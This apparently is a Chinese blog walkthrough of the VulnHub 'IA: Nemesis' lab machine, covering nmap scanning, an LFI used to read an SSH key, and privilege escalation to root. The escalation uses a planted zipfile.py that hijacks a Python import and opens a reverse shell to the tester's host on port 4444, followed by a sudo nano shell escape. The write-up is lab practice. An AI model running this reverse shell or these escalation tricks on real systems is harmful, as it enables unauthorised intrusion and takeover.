vulnhub 靶机练习(四)

XTTF 2021年02月18日 152次浏览

IA: Nemesis (1.0.1) 靶机练习

信息搜集

首先使用nmap进行主机IP探测,通过结果得到IP为192.168.0.102

nmap -sP 192.168.0.0/24

使用nmap进行端口探测,只探测到80端口开放

nmap -v --script vuln 192.168.0.102

练习过程

在主页发现了一处信息泄露,可以拿到一组登录信息

拿得到的账号登录网站,得到了一处写有website defaced的页面

再次使用nmap进行全端口扫描

nmap -A -p- 192.168.0.102

发现了两个新端口

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 19:57 CST
Nmap scan report for 192.168.0.102
Host is up (0.00069s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home
52845/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Ethereal - Free Responsive HTML5 Website Template
52846/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 70:c4:06:3e:3c:0f:28:b3:dc:66:96:30:d7:c8:d5:63 (RSA)
|   256 e3:ca:81:e9:b5:b0:bc:21:61:42:04:3b:85:ca:57:1b (ECDSA)
|_  256 fd:b8:04:e1:e0:0f:aa:21:e5:79:68:78:1f:05:15:59 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

打开新网站发现存在一处可以输入的地方

随便输入一些信息,发现弹窗,提示消息已保存在文件中,感觉这里有戏

使用burp在此处抓包,进行Fuzz

可以发现此处存在LFI漏洞

使用thanos用户,发现需要私钥才能登陆,先读下私钥信息吧

 ssh -p 52846 thanos@192.168.0.102
The authenticity of host '[192.168.0.102]:52846 ([192.168.0.102]:52846)' can't be established.
ECDSA key fingerprint is SHA256:rz9ROPFbYXsfi1wkrQvJ0QrmRVoOdRGy3+KBHKEoNuU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.0.102]:52846' (ECDSA) to the list of known hosts.
thanos@192.168.0.102: Permission denied (publickey).


拿到第一个flag

发现还存在一个py文件,发现在tmp存在website.zip

cat backup.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/tmp/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()

这里卡了一下,又是万能的youtube大佬介绍了一种方法即使用Python调用库https://rastating.github.io/privilege-escalation-via-python-library-hijacking/,即按照特定优先级进行调用,可以使用以下脚本查看

python -c 'import sys; print "\n".join(sys.path)'

这里通过运行拿到了本靶机的库调用

/usr/lib/python2.7
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/lib-tk
/usr/lib/python2.7/lib-old
/usr/lib/python2.7/lib-dynload
/usr/local/lib/python2.7/dist-packages
/usr/lib/python2.7/dist-packages

可以通过在backup.py同目录创建zipfile.py反向链接

import os
import pty
import socket

lhost = "192.168.0.109"
lport = 4444

ZIP_DEFLATED = 0

class ZipFile:
    def close(*args):
        return

    def write(*args):
        return

    def __init__(self, *args):
        return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()

拿到第二个flag

打开root.txt提示密码使用encrypt.py进行加密

def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
    gcd = b
    return gcd, x, y

def modinv(a, m):
    gcd, x, y = egcd(a, m)
    if gcd != 1:
        return None
    else:
        return x % m

def affine_encrypt(text, key):
    return ''.join([ chr((( key[0]*(ord(t) - ord('A')) + key[1] ) % 26)
                  + ord('A')) for t in text.upper().replace(' ', '') ])

def affine_decrypt(cipher, key):
    return ''.join([ chr((( modinv(key[0], 26)*(ord(c) - ord('A') - key[1]))
                    % 26) + ord('A')) for c in cipher ])

def main():
    text = 'REDACTED'
    affine_encrypted_text="FAJSRWOXLAXDQZAWNDDVLSU"
    key = [REDACTED,REDACTED]
    print('Decrypted Text: {}'.format
    ( affine_decrypt(affine_encrypted_text, key) ))

if __name__ == '__main__':
    main()

通过好哥们的帮助,拿到了密码为ENCRYPTIONISFUNPASSWORD(一个网站https://www.dcode.fr/)

执行sudo -l

[sudo] password for carlos:
Matching Defaults entries for carlos on nemesis:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User carlos may run the following commands on nemesis:
    (root) /bin/nano /opt/priv

使用nano进行提权

sudo nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

成功拿到root权限

读到最后一个flag

用到的网站